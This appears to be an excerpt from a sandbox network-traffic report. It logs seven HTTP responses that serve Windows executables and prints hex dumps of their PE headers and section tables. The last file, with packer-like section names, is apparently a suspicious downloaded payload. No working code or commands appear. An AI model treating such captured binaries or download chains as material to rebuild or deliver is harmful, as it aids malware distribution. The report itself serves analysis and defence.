Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 02:12:13 GMTContent-Type: application/octet-streamContent-Length: 1907200Last-Modified: Tue, 02 Jul 2024 01:58:58 GMTConnection: keep-aliveETag: "66835ee2-1d1a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 f0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4c 00 00 04 00 00 1a 91 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 de 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 dd 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 77 74 68 63 75 75 78 00 00 1a 00 00 e0 31 00 00 00 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 67 65 6a 70 76 67 75 00 10 00 00 00 e0 4b 00 00 06 00 00 00 f2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4b 00 00 22 00 00 00 f8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
